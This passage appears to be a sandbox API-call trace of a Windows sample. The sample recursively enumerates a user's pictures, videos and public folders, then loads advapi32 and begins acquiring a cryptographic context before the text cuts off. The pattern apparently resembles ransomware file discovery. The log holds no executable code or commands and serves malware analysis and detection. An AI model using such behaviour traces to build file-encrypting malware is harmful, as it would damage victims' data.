lpFileName="c:\\users\\eebsym5\\pictures\\mw7_qp2tajy2\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x29a840 [0043.946] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\mw7_qp2tajy2\\JfMyI.png" (normalized: "c:\\users\\eebsym5\\pictures\\mw7_qp2tajy2\\jfmyi.png"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49a3f0f0, ftCreationTime.dwHighDateTime=0x1d4178f, ftLastAccessTime.dwLowDateTime=0x6cfd31e0, ftLastAccessTime.dwHighDateTime=0x1d41edf, ftLastWriteTime.dwLowDateTime=0x6cfd31e0, ftLastWriteTime.dwHighDateTime=0x1d41edf, nFileSizeHigh=0x0, nFileSizeLow=0x1791)) returned 1 [0043.946] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\mw7_qp2tajy2\\JnqdBtVfgIlNYW8O2gt.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\mw7_qp2tajy2\\jnqdbtvfgilnyw8o2gt.jpg"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5278c4a0, ftCreationTime.dwHighDateTime=0x1d41ce2, ftLastAccessTime.dwLowDateTime=0xc4f17460, ftLastAccessTime.dwHighDateTime=0x1d415b1, ftLastWriteTime.dwLowDateTime=0xc4f17460, ftLastWriteTime.dwHighDateTime=0x1d415b1, nFileSizeHigh=0x0, nFileSizeLow=0x14db8)) returned 1 [0043.950] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0043.950] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x29a840 [0043.950] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\8Ts0uAQM9t.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\8ts0uaqm9t.bmp"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab5ca9a0, ftCreationTime.dwHighDateTime=0x1d415a9, ftLastAccessTime.dwLowDateTime=0x26769c50, ftLastAccessTime.dwHighDateTime=0x1d41400, ftLastWriteTime.dwLowDateTime=0x26769c50, ftLastWriteTime.dwHighDateTime=0x1d41400, nFileSizeHigh=0x0, nFileSizeLow=0x2b33)) returned 1 [0043.951] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\feu2p9pnj\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x2981c0 [0043.951] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\feu2p9pnj\\d4M7Pb.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\feu2p9pnj\\d4m7pb.bmp"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8e3cb50, ftCreationTime.dwHighDateTime=0x1d41a94, ftLastAccessTime.dwLowDateTime=0xd63a21f0, ftLastAccessTime.dwHighDateTime=0x1d41de4, ftLastWriteTime.dwLowDateTime=0xd63a21f0, ftLastWriteTime.dwHighDateTime=0x1d41de4, nFileSizeHigh=0x0, nFileSizeLow=0xfdc4)) returned 1 [0043.952] FindClose (in: hFindFile=0x2981c0 | out: hFindFile=0x2981c0) returned 1 [0043.952] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\L6Fb6hqbzj9MiN-ofUN.png" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\l6fb6hqbzj9min-ofun.png"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d1eaec0, ftCreationTime.dwHighDateTime=0x1d41b31, ftLastAccessTime.dwLowDateTime=0x9359b5c0, ftLastAccessTime.dwHighDateTime=0x1d4136d, ftLastWriteTime.dwLowDateTime=0x9359b5c0, ftLastWriteTime.dwHighDateTime=0x1d4136d, nFileSizeHigh=0x0, nFileSizeLow=0xfa3c)) returned 1 [0043.952] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\mGT0p_Tr.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\mgt0p_tr.bmp"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7232ca0, ftCreationTime.dwHighDateTime=0x1d4186b, ftLastAccessTime.dwLowDateTime=0xad8a7c90, ftLastAccessTime.dwHighDateTime=0x1d4180e, ftLastWriteTime.dwLowDateTime=0xad8a7c90, ftLastWriteTime.dwHighDateTime=0x1d4180e, nFileSizeHigh=0x0, nFileSizeLow=0x8eac)) returned 1 [0043.953] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\y-zQFZJ.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\y-zqfzj.jpg"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf63424e0, ftCreationTime.dwHighDateTime=0x1d41c79, ftLastAccessTime.dwLowDateTime=0xe171a360, ftLastAccessTime.dwHighDateTime=0x1d418e7, ftLastWriteTime.dwLowDateTime=0xe171a360, ftLastWriteTime.dwHighDateTime=0x1d418e7, nFileSizeHigh=0x0, nFileSizeLow=0x167c4)) returned 1 [0043.953] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x2981c0 [0043.953] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\-Fpr-sZrBju7OkCv-3m.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\-fpr-szrbju7okcv-3m.jpg"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4412abe0, ftCreationTime.dwHighDateTime=0x1d41523, ftLastAccessTime.dwLowDateTime=0xcee326c0, ftLastAccessTime.dwHighDateTime=0x1d41b25, ftLastWriteTime.dwLowDateTime=0xcee326c0, ftLastWriteTime.dwHighDateTime=0x1d41b25, nFileSizeHigh=0x0, nFileSizeLow=0xa85a)) returned 1 [0043.954] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\Bce_d-XMAoTaX.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\bce_d-xmaotax.bmp"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d956e60, ftCreationTime.dwHighDateTime=0x1d41b1c, ftLastAccessTime.dwLowDateTime=0x25ce5e80, ftLastAccessTime.dwHighDateTime=0x1d41439, ftLastWriteTime.dwLowDateTime=0x25ce5e80, ftLastWriteTime.dwHighDateTime=0x1d41439, nFileSizeHigh=0x0, nFileSizeLow=0x184a5)) returned 1 [0043.954] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\eba e clRM.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\eba e clrm.jpg"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe938e510, ftCreationTime.dwHighDateTime=0x1d415de, ftLastAccessTime.dwLowDateTime=0x143a7260, ftLastAccessTime.dwHighDateTime=0x1d41080, ftLastWriteTime.dwLowDateTime=0x143a7260, ftLastWriteTime.dwHighDateTime=0x1d41080, nFileSizeHigh=0x0, nFileSizeLow=0x1b2e)) returned 1 [0043.955] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\N Aw.png" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\n aw.png"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77137890, ftCreationTime.dwHighDateTime=0x1d419a5, ftLastAccessTime.dwLowDateTime=0xe381c530, ftLastAccessTime.dwHighDateTime=0x1d41eba, ftLastWriteTime.dwLowDateTime=0xe381c530, ftLastWriteTime.dwHighDateTime=0x1d41eba, nFileSizeHigh=0x0, nFileSizeLow=0x8783)) returned 1 [0043.955] FindClose (in: hFindFile=0x2981c0 | out: hFindFile=0x2981c0) returned 1 [0043.955] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\zVtAqhAG4.png" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\zvtaqhag4.png"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8f3f330, ftCreationTime.dwHighDateTime=0x1d41fd1, ftLastAccessTime.dwLowDateTime=0xf86a80b0, ftLastAccessTime.dwHighDateTime=0x1d41314, ftLastWriteTime.dwLowDateTime=0xf86a80b0, ftLastWriteTime.dwHighDateTime=0x1d41314, nFileSizeHigh=0x0, nFileSizeLow=0x32d3)) returned 1 [0043.956] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0043.956] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\pictures\\wvfrz77skzkohq3\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x29a840 [0043.956] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\wvfrz77skzkohq3\\Fwwltk.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\wvfrz77skzkohq3\\fwwltk.jpg"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74abc6f0, ftCreationTime.dwHighDateTime=0x1d412cc, ftLastAccessTime.dwLowDateTime=0x34503090, ftLastAccessTime.dwHighDateTime=0x1d41acf, ftLastWriteTime.dwLowDateTime=0x34503090, ftLastWriteTime.dwHighDateTime=0x1d41acf, nFileSizeHigh=0x0, nFileSizeLow=0x18b1a)) returned 1 [0043.956] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\wvfrz77skzkohq3\\MWr3SQ-BGboazakHKvR.png" (normalized: "c:\\users\\eebsym5\\pictures\\wvfrz77skzkohq3\\mwr3sq-bgboazakhkvr.png"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x412eef60, ftCreationTime.dwHighDateTime=0x1d413cf, ftLastAccessTime.dwLowDateTime=0xbba410a0, ftLastAccessTime.dwHighDateTime=0x1d41dd8, ftLastWriteTime.dwLowDateTime=0xbba410a0, ftLastWriteTime.dwHighDateTime=0x1d41dd8, nFileSizeHigh=0x0, nFileSizeLow=0x109d5)) returned 1 [0043.957] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\wvfrz77skzkohq3\\twbKot Z-u88qG9Lw.png" (normalized: "c:\\users\\eebsym5\\pictures\\wvfrz77skzkohq3\\twbkot z-u88qg9lw.png"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82956570, ftCreationTime.dwHighDateTime=0x1d41fa9, ftLastAccessTime.dwLowDateTime=0x6323a880, ftLastAccessTime.dwHighDateTime=0x1d419c5, ftLastWriteTime.dwLowDateTime=0x6323a880, ftLastWriteTime.dwHighDateTime=0x1d419c5, nFileSizeHigh=0x0, nFileSizeLow=0x6fb6)) returned 1 [0043.957] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0043.957] FindClose (in: hFindFile=0x2897f8 | out: hFindFile=0x2897f8) returned 1 [0043.957] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\printhood\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.958] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\recent\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.958] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\saved games\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x2897f8 [0043.958] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\saved games\\desktop.ini" (normalized: "c:\\users\\eebsym5\\saved games\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ebeb90, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ebeb90, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec45a820, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x11a)) returned 1 [0043.958] FindClose (in: hFindFile=0x2897f8 | out: hFindFile=0x2897f8) returned 1 [0043.958] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\searches\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x2897f8 [0043.959] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\searches\\desktop.ini" (normalized: "c:\\users\\eebsym5\\searches\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ebeb90, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ebeb90, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec4346c0, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x20c)) returned 1 [0043.959] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\searches\\Everywhere.search-ms" (normalized: "c:\\users\\eebsym5\\searches\\everywhere.search-ms"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x8e98a30, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8e98a30, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0x27feeae6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xf8)) returned 1 [0043.960] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\eebsym5\\searches\\indexed locations.search-ms"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x8e98a30, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8e98a30, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0x27feeae6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xf8)) returned 1 [0043.960] FindClose (in: hFindFile=0x2897f8 | out: hFindFile=0x2897f8) returned 1 [0043.960] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\sendto\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.960] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\start menu\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.961] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\templates\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.961] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\videos\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x2897f8 [0043.961] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\videos\\3mLSDRlx0hC.swf" (normalized: "c:\\users\\eebsym5\\videos\\3mlsdrlx0hc.swf"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81dd51e0, ftCreationTime.dwHighDateTime=0x1d41dad, ftLastAccessTime.dwLowDateTime=0x5e03ff20, ftLastAccessTime.dwHighDateTime=0x1d41426, ftLastWriteTime.dwLowDateTime=0x5e03ff20, ftLastWriteTime.dwHighDateTime=0x1d41426, nFileSizeHigh=0x0, nFileSizeLow=0xc662)) returned 1 [0043.962] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\videos\\desktop.ini" (normalized: "c:\\users\\eebsym5\\videos\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8e98a30, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8e98a30, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec3e8400, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x1f8)) returned 1 [0043.962] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\videos\\kpdp\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x29a840 [0043.963] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x2981c0 [0043.964] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\3snn.mp4" (normalized: "c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\3snn.mp4"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63b0eb0, ftCreationTime.dwHighDateTime=0x1d41e8e, ftLastAccessTime.dwLowDateTime=0x544093a0, ftLastAccessTime.dwHighDateTime=0x1d413df, ftLastWriteTime.dwLowDateTime=0x544093a0, ftLastWriteTime.dwHighDateTime=0x1d413df, nFileSizeHigh=0x0, nFileSizeLow=0x76cc)) returned 1 [0043.965] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\JYX8uxKaLTwB.swf" (normalized: "c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\jyx8uxkaltwb.swf"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xded7d870, ftCreationTime.dwHighDateTime=0x1d41533, ftLastAccessTime.dwLowDateTime=0xf2560440, ftLastAccessTime.dwHighDateTime=0x1d41aa0, ftLastWriteTime.dwLowDateTime=0xf2560440, ftLastWriteTime.dwHighDateTime=0x1d41aa0, nFileSizeHigh=0x0, nFileSizeLow=0x47cd)) returned 1 [0043.966] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\u0oORfLT.swf" (normalized: "c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\u0oorflt.swf"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2562cb40, ftCreationTime.dwHighDateTime=0x1d41dd8, ftLastAccessTime.dwLowDateTime=0x76cd2200, ftLastAccessTime.dwHighDateTime=0x1d411a8, ftLastWriteTime.dwLowDateTime=0x76cd2200, ftLastWriteTime.dwHighDateTime=0x1d411a8, nFileSizeHigh=0x0, nFileSizeLow=0x90bc)) returned 1 [0043.966] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\VFctuaULnkw_.mp4" (normalized: "c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\vfctuaulnkw_.mp4"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9c8290, ftCreationTime.dwHighDateTime=0x1d41bff, ftLastAccessTime.dwLowDateTime=0x2db6a3a0, ftLastAccessTime.dwHighDateTime=0x1d4163c, ftLastWriteTime.dwLowDateTime=0x2db6a3a0, ftLastWriteTime.dwHighDateTime=0x1d4163c, nFileSizeHigh=0x0, nFileSizeLow=0xd42)) returned 1 [0043.966] FindClose (in: hFindFile=0x2981c0 | out: hFindFile=0x2981c0) returned 1 [0043.967] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\videos\\kpdp\\um5e_wD.swf" (normalized: "c:\\users\\eebsym5\\videos\\kpdp\\um5e_wd.swf"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0468780, ftCreationTime.dwHighDateTime=0x1d4161a, ftLastAccessTime.dwLowDateTime=0x3d4250e0, ftLastAccessTime.dwHighDateTime=0x1d41d5c, ftLastWriteTime.dwLowDateTime=0x3d4250e0, ftLastWriteTime.dwHighDateTime=0x1d41d5c, nFileSizeHigh=0x0, nFileSizeLow=0x2f62)) returned 1 [0043.967] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0043.967] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\videos\\lqvw5f5nm7pq\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x29a840 [0043.968] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\videos\\lqvw5f5nm7pq\\0jTAPsyhgixj.swf" (normalized: "c:\\users\\eebsym5\\videos\\lqvw5f5nm7pq\\0jtapsyhgixj.swf"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf07b570, ftCreationTime.dwHighDateTime=0x1d41f5b, ftLastAccessTime.dwLowDateTime=0x8346750, ftLastAccessTime.dwHighDateTime=0x1d41c15, ftLastWriteTime.dwLowDateTime=0x8346750, ftLastWriteTime.dwHighDateTime=0x1d41c15, nFileSizeHigh=0x0, nFileSizeLow=0x843a)) returned 1 [0043.970] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0043.971] FindClose (in: hFindFile=0x2897f8 | out: hFindFile=0x2897f8) returned 1 [0043.971] FindClose (in: hFindFile=0x288be8 | out: hFindFile=0x288be8) returned 1 [0043.972] FindFirstFileW (in: lpFileName="c:\\users\\public\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x2897f8 [0043.972] FindFirstFileW (in: lpFileName="c:\\users\\public\\desktop\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x29a840 [0043.973] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0043.973] FindFirstFileW (in: lpFileName="c:\\users\\public\\documents\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x29a840 [0043.974] FindFirstFileW (in: lpFileName="c:\\users\\public\\documents\\my music\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0xffffffff [0043.974] FindFirstFileW (in: lpFileName="c:\\users\\public\\documents\\my pictures\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0xffffffff [0043.974] FindFirstFileW (in: lpFileName="c:\\users\\public\\documents\\my videos\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0xffffffff [0043.974] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0043.974] FindFirstFileW (in: lpFileName="c:\\users\\public\\downloads\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x29a840 [0043.976] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0043.976] FindFirstFileW (in: lpFileName="c:\\users\\public\\favorites\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x29a840 [0043.976] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0043.976] FindFirstFileW (in: lpFileName="c:\\users\\public\\libraries\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x29a840 [0043.977] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0043.977] FindFirstFileW (in: lpFileName="c:\\users\\public\\music\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x29a840 [0043.978] FindFirstFileW (in: lpFileName="c:\\users\\public\\music\\sample music\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x2981c0 [0044.016] FindClose (in: hFindFile=0x2981c0 | out: hFindFile=0x2981c0) returned 1 [0044.017] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0044.017] FindFirstFileW (in: lpFileName="c:\\users\\public\\pictures\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x29a840 [0044.017] FindFirstFileW (in: lpFileName="c:\\users\\public\\pictures\\sample pictures\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x2981c0 [0044.025] FindClose (in: hFindFile=0x2981c0 | out: hFindFile=0x2981c0) returned 1 [0044.025] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0044.026] FindFirstFileW (in: lpFileName="c:\\users\\public\\recorded tv\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x29a840 [0044.044] FindFirstFileW (in: lpFileName="c:\\users\\public\\recorded tv\\sample media\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x2981c0 [0044.045] FindClose (in: hFindFile=0x2981c0 | out: hFindFile=0x2981c0) returned 1 [0044.045] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0044.046] FindFirstFileW (in: lpFileName="c:\\users\\public\\videos\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x29a840 [0044.046] FindFirstFileW (in: lpFileName="c:\\users\\public\\videos\\sample videos\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x2981c0 [0044.047] FindClose (in: hFindFile=0x2981c0 | out: hFindFile=0x2981c0) returned 1 [0044.047] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0044.047] FindClose (in: hFindFile=0x2897f8 | out: hFindFile=0x2897f8) returned 1 [0044.047] FindClose (in: hFindFile=0x284da0 | out: hFindFile=0x284da0) returned 1 [0044.048] FindClose (in: hFindFile=0x2838e8 | out: hFindFile=0x2838e8) returned 1 [0044.048] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x769f0000 [0044.048] LoadLibraryExW (lpLibFileName="api-ms-win-core-sysinfo-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0044.048] GetLastError () returned 0x57 [0044.048] LoadLibraryExW (lpLibFileName="api-ms-win-core-sysinfo-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0044.049] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f05c | out: lpSystemTimeAsFileTime=0x12f05c*(dwLowDateTime=0x5e482130, dwHighDateTime=0x1d433a9)) [0044.049] GetLastError () returned 0x7e [0044.049] GetUserDefaultLCID () returned 0x409 [0044.049] GetModuleHandleW (lpModuleName="advapi32.dll") returned 0x769f0000 [0044.049] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0044.049] CryptAcquireContextW (in: phProv=0x447894, szContainer=0x0, szProvider="Microsoft Enhanced 